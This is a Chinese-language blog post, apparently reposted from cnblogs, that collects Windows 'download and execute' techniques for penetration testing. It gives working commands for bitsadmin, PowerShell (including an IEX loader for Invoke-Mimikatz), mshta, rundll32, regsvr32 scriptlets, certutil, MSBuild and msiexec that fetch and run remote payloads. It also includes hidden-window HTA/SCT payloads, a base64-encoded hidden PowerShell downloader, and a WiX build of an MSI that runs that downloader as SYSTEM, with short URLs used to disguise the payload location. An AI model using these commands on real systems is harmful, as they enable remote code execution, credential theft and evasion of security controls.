• windows下载执行命令大全


     

    1.bitsadmin命令(只能命令下载到指定路径上,win7以上):

    bitsadmin /transfer myDownLoadJob /download /priority normal "http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg" "d:abc.jpg"
    bitsadmin /transfer d90f http://site.com/a %APPDATA%d90f.exe&%APPDATA%d90f.exe&del %APPDATA%d90f.exe

    2.powershell命名下载执行:(win7以上)

    powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz
    
    
    powershell -exec bypass -f \webdavserverfolderpayload.ps1
    
    
    powershell (new-object System.Net.WebClient).DownloadFile( ‘http://192.168.168.183/1.exe’,’C:111111111111111.exe’)
    
    
    powershell -w hidden -c (new-object System.Net.WebClient).Downloadfile('http://img5.cache.netease.com/photo/0001/2013-03-28/8R1BK3QO3R710001.jpg','d:\1.jpg')

    3.mshta命令下载执行

    mshta vbscript:Close(Execute("GetObject(""script:http://webserver/payload.sct"")"))
    
    mshta http://webserver/payload.hta --->短域名:http://sina.lt/-->mshta http://t.cn/RYUQyF8
    
    mshta \webdavserverfolderpayload.hta

    payload.hta

    <HTML>
    
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
    
    <HEAD>
    
    <script language="VBScript">
    
    Window.ReSizeTo 0, 0
    
    Window.moveTo -2000,-2000
    
    Set objShell = CreateObject("Wscript.Shell")
    
    objShell.Run "calc.exe"
    
    self.close
    
    </script>
    
    <body>
    
    demo
    
    </body>
    
    </HEAD>
    
    </HTML>

    4.rundll32命令下载执行

    rundll32 \webdavserverfolderpayload.dll,entrypoint
    
    rundll32.exe javascript:"..mshtml,RunHTMLApplication";o=GetObject("script:http://webserver/payload.sct");window.close();

    参考:https://github.com/3gstudent/Javascript-Backdoor

    5.net中的regasm命令下载执行

    C:WindowsMicrosoft.NETFramework64v4.0.30319
    egasm.exe /u \webdavserverfolderpayload.dll

    6.cmd的远程命令下载:

    cmd.exe /k < \webdavserverfolderatchfile.txt

    7.regsvr32命令下载执行

    regsvr32 /u /n /s /i:http://webserver/payload.sct scrobj.dll
    regsvr32 /u /n /s /i:\webdavserverfolderpayload.sct scrobj.dll
    regsvr32
    /u /s /i:http://site.com/js.png scrobj.dll

    js.png

    <?XML version="1.0"?>
    
    <scriptlet>
    
    <registration
    
        progid="ShortJSRAT"
    
        classid="{10001111-0000-0000-0000-0000FEEDACDC}" >
    
        <!-- Learn from Casey Smith @subTee -->
    
        <script language="JScript">
    
            <![CDATA[
    
                ps  = "cmd.exe /c calc.exe";
    
                new ActiveXObject("WScript.Shell").Run(ps,0,true);
    
     
    
            ]]>
    
    </script>
    
    </registration>
    
    </scriptlet>

    8.certutil命令下载执行

    certutil -urlcache -split -f http://webserver/payload payload
    
    certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:WindowsMicrosoft.NETFramework64v4.0.30319InstallUtil /logfile= /LogToConsole=false /u payload.dll
    
    
    certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe
    
    
    certutil -urlcache -split -f http://site.com/a a.exe && a.exe &&  del a.exe && certutil -urlcache -split -f http://192.168.254.102:80/a delete

    9.net中的MSBulid命令下载执行

    cmd /V /c "set MB="C:WindowsMicrosoft.NETFramework64v4.0.30319MSBuild.exe" & !MB! /noautoresponse /preprocess \webdavserverfolderpayload.xml > payload.xml & !MB! payload.xml"  

    10. odbcconf命令下载执行

    odbcconf /s /a {regsvr \webdavserverfolderpayload_dll.txt}

    11.cscript脚本远程命令下载执行

    cscript /b C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1 script:https://raw.githubusercontent.com/3gstudent/test/master/downloadexec3.sct
    
    cscript //E:jscript \webdavserverfolderpayload.txt

    downfile.vbs:

    ' Set your settings
    
    strFileURL = "http://www.it1.net/images/it1_logo2.jpg"
    
    strHDLocation = "c:logo.jpg"
    
    ' Fetch the file
    
    Set objXMLHTTP = CreateObject("MSXML2.XMLHTTP")
    
    objXMLHTTP.open "GET", strFileURL, false
    
    objXMLHTTP.send()
    
    If objXMLHTTP.Status = 200 Then
    
    Set objADOStream = CreateObject("ADODB.Stream")
    
    objADOStream.Open
    
    objADOStream.Type = 1 'adTypeBinary
    
    objADOStream.Write objXMLHTTP.ResponseBody
    
    objADOStream.Position = 0'Set the stream position to the start
    
    Set objFSO = Createobject("Scripting.FileSystemObject")
    
    If objFSO.Fileexists(strHDLocation) Then objFSO.DeleteFile strHDLocation
    
    Set objFSO = Nothing
    
    objADOStream.SaveToFile strHDLocation
    
    objADOStream.Close
    
    Set objADOStream = Nothing
    
    End if
    
    Set objXMLHTTP = Nothing

    将以上保存为downfile.vbs

    输入命令:cscript  downfile.vbs

    12.pubprn.vbs下载执行命令

    cscript /b C:WindowsSystem32Printing_Admin_Scriptszh-CNpubprn.vbs 127.0.0.1  script:https://gist.githubusercontent.com/enigma0x3/64adf8ba99d4485c478b67e03ae6b04a/raw/a006a47e4075785016a62f7e5170ef36f5247cdb/test.sct

    13.windows自带命令copy

    copy \x.x.x.xxxpoc.exe
    
    xcopy d:	est.exe  \x.x.x.x	est.exe

    14. IEXPLORE.EXE命令下载执行(需要IE存在oday)

    "C:Program FilesInternet ExplorerIEXPLORE.EXE" http://site.com/exp

    15.IEEXC命令下载执行

    C:WindowsMicrosoft.NETFrameworkv2.0.50727> caspol -s off
    C:WindowsMicrosoft.NETFrameworkv2.
    0.50727> IEExec http://site.com/files/test64.exe

    参考:https://room362.com/post/2014/2014-01-16-application-whitelist-bypass-using-ieexec-dot-exe/

    16. msiexec命令下载执行

    msiexec /q /i http://site.com/payloads/calc.png

    该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述

    首先将powershell实现下载执行的代码作base64编码:

    $fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com/3gstudent/test/raw/master/putty.exe','c:downloada.exe');start-process 'c:downloada.exe'"
    $bytes  = [System.Text.Encoding]::Unicode.GetBytes($fileContent);
    $encoded = [System.Convert]::ToBase64String($bytes); 
    $encoded

    得到:

    KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

    完整powershell命令为:

    powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==

    完整wix文件为:

    <?xml version="1.0"?>
    <Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
      <Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product 
    Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
        <Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
        <Media Id="1" />
        <Directory Id="TARGETDIR" Name="SourceDir">
          <Directory Id="ProgramFilesFolder">
            <Directory Id="INSTALLLOCATION" Name="Example">
              <Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">     
              </Component>
            </Directory>
          </Directory>
        </Directory>
        <Feature Id="DefaultFeature" Level="1">
          <ComponentRef Id="ApplicationFiles"/>
        </Feature>
        <Property Id="cmdline">powershell -WindowStyle Hidden -enc KABuAGUAdwAtAG8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGcAaQB0AGgAdQBiAC4AYwBvAG0ALwAzAGcAcwB0AHUAZABlAG4AdAAvAHQAZQBzAHQALwByAGEAdwAvAG0AYQBzAHQAZQByAC8AcAB1AHQAdAB5AC4AZQB4AGUAJwAsACcAYwA6AFwAZABvAHcAbgBsAG8AYQBkAFwAYQAuAGUAeABlACcAKQA7AHMAdABhAHIAdAAtAHAAcgBvAGMAZQBzAHMAIAAnAGMAOgBcAGQAbwB3AG4AbABvAGEAZABcAGEALgBlAHgAZQAnAA==
        </Property>
        <CustomAction Id="SystemShell" Execute="deferred" Directory="TARGETDIR" 
    ExeCommand='[cmdline]' Return="ignore" Impersonate="no"/>
        <CustomAction Id="FailInstall" Execute="deferred" Script="vbscript" Return="check">
          invalid vbs to fail install
        </CustomAction>
        <InstallExecuteSequence>
          <Custom Action="SystemShell" After="InstallInitialize"></Custom>
          <Custom Action="FailInstall" Before="InstallFiles"></Custom>
        </InstallExecuteSequence>
      </Product>
    </Wix>

    将其编译,生成msi文件,命令如下:

    candle.exe msigen.wix
    
    light.exe msigen.wixobj

    生成test.msi

    实现功能:

    msiexec /q /i https://github.com/3gstudent/test/raw/master/test.msi

    注:

    执行后需要手动结束进程msiexec.exe

    结合百度提供的短地址服务(http://dwz.cn/), 实现代码为34个字符,代码如下:

    msiexec /q /i http://dwz.cn/6UJpF8

    17.下载命令执行项目GreatSCT

    https://github.com/GreatSCT/

  • 相关阅读:
    【题解】 P1373 小a和uim之大逃离
    题解 CF576C 【Points on Plane】
    题解 P4799 【[CEOI2015 Day2]世界冰球锦标赛】
    【题解】[JSOI2008]最大数
    题解 P3389 【【模板】高斯消元法】
    【模板】矩阵加速
    【模板】树状数组上的差分数组
    tarjan求强连通分量(模板)
    我好菜系列——map查找
    trie树的应用;
  • 原文地址:https://www.cnblogs.com/backlion/p/7908563.html
Copyright © 2020-2023  润新知